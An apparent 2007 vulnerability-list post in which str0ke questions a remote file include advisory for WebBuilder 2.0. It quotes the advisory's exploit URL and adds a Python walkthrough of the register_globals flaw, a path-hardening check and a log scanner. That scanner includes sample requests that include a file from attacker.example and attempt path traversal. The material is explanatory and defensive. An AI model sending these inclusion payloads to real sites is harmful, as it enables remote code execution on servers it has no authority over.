[VIM] true: WebBuilder <= 2.0 Remote File Include Vulnerability

str0ke str0ke at milw0rm.com
Thu Feb 1 14:52:41 EST 2007


The first line of code contains:

require_once($GLOBALS['core']['module_path'].'/module_common.php');

After looking at the www directory, I found it contains an .htaccess file
with the following:

php_flag zlib.output_compression off
php_flag short_open_tag off
php_flag register_globals off
php_flag asp_tags off
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off

I thought maybe the library directory wasn't supposed to be accessed
by HTTP requests, since there isn't an .htaccess file for it.

INSTALLATION notes:
To install the WebBuilder simply point your browser at www/index.php and enter
any requested information. This will setup your database and core configuration.

This shows accessing the library directory shouldn't be an issue.

/str0ke



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WebBuilder <=  Remote File Include Vulnerability
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_ at W.Cn
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL:
             *
http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /library/StageLoader.php
             *
require_once($GLOBALS['core']['module_path'].'/module_common.php');
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
             *
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?
    *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com &
Google.Com     *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



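The following is an added worked example, not code from the VIM post, from the advisory or from WebBuilder. It models what the advisory describes: under register_globals=On, PHP turned a request parameter named GLOBALS[core][module_path] into an overwrite of $GLOBALS['core']['module_path'], so the require_once() in /library/StageLoader.php received attacker-controlled input; the trailing "?" in the exploit value makes the appended "/module_common.php" part of the remote URL's query string, so the fetched file is exactly the attacker's. The attacker host attacker.example, the configured module_path value and the access-log lines are constructed for the demonstration; the hardening check and log triage are written in Python rather than PHP so they run stand-alone.

```python
"""Added example (not from the VIM post or WebBuilder): how register_globals
let GLOBALS[core][module_path] reach require_once(), a hardened check for the
same value, and a log triage pass.  Hosts, paths and log lines are constructed."""
import os
import re
from urllib.parse import unquote_plus

# Values PHP would hand to a stream wrapper instead of the local filesystem.
WRAPPER_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*://|php:|data:|phar:)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def parse_php_query(query):
    """Build $_GET the way PHP does: 'a[b][c]=v' nests into {'a': {'b': {'c': 'v'}}}.
    Only the first '?' of a URL starts the query, so values may contain '?'."""
    result = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(value)
        base, _, rest = name.partition("[")
        keys = [base] + (rest.rstrip("]").split("][") if rest else [])
        node = result
        for key in keys[:-1]:
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
        node[keys[-1]] = value
    return result


def _merge(dst, src):
    for key, value in src.items():
        if isinstance(value, dict) and isinstance(dst.get(key), dict):
            _merge(dst[key], value)
        else:
            dst[key] = value


def register_globals(get, php_globals):
    """Emulate register_globals=On: each parameter becomes a global, and a
    parameter named GLOBALS merges into the $GLOBALS array itself.  That is
    how request data overwrote a value the code treated as configuration
    (register_globals was removed in PHP 5.4)."""
    for name, value in get.items():
        if name == "GLOBALS" and isinstance(value, dict):
            _merge(php_globals, value)
        else:
            php_globals[name] = value
    return php_globals


def stage_loader_target(php_globals):
    """The string StageLoader.php passes to require_once():
    $GLOBALS['core']['module_path'] . '/module_common.php'."""
    core = php_globals.get("core") or {}
    return str(core.get("module_path", "")) + "/module_common.php"


def is_safe_module_path(module_path, base_dir):
    """Hardened check: refuse stream wrappers and anything that leaves base_dir
    after normalisation.  String logic only, so it needs no filesystem."""
    if WRAPPER_RE.match(module_path):
        return False
    base = os.path.normpath(base_dir)
    target = os.path.normpath(os.path.join(base, module_path))
    try:
        return os.path.commonpath([base, target]) == base
    except ValueError:  # different drives on Windows
        return False


def _leaf_values(node):
    if isinstance(node, dict):
        for child in node.values():
            yield from _leaf_values(child)
    else:
        yield node


# Constructed Apache-style log lines; the first two are attempts on StageLoader.php.
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Feb/2007:14:52:41 -0500] "GET /library/StageLoader.php'
    '?GLOBALS[core][module_path]=http://attacker.example/Evil.txt? HTTP/1.0" 200 612',
    '203.0.113.9 - - [01/Feb/2007:14:52:58 -0500] "GET /library/StageLoader.php'
    '?GLOBALS[core][module_path]=../../../../etc HTTP/1.0" 500 0',
    '198.51.100.4 - - [01/Feb/2007:14:53:02 -0500] "GET /www/index.php?stage=home HTTP/1.1" 200 4110',
]


def flag_requests(lines):
    """Return (path, reasons) for requests that try to overwrite $GLOBALS or
    carry a stream-wrapper URL or traversal in any parameter value."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        get = parse_php_query(query)
        reasons = []
        if "GLOBALS" in get:
            reasons.append("GLOBALS overwrite (register_globals)")
        for value in _leaf_values(get):
            if WRAPPER_RE.match(value):
                reasons.append("stream wrapper in value: " + value)
            elif ".." in value.split("/"):
                reasons.append("path traversal in value: " + value)
        if reasons:
            hits.append((path, reasons))
    return hits


if __name__ == "__main__":
    g = {"core": {"module_path": "/srv/webbuilder/library/modules"}}  # assumed config value
    register_globals(parse_php_query("GLOBALS[core][module_path]=http://attacker.example/Evil.txt?"), g)
    print("require_once() receives:", stage_loader_target(g))
    for path, reasons in flag_requests(SAMPLE_LOG):
        print(path, reasons)
```

The check in is_safe_module_path only limits the damage; the actual fix is to set module_path from the application's own configuration before StageLoader.php uses it, and to run with register_globals off (and allow_url_include off on PHP 5.2 and later) for the library directory as well as www, which is the gap str0ke points out above.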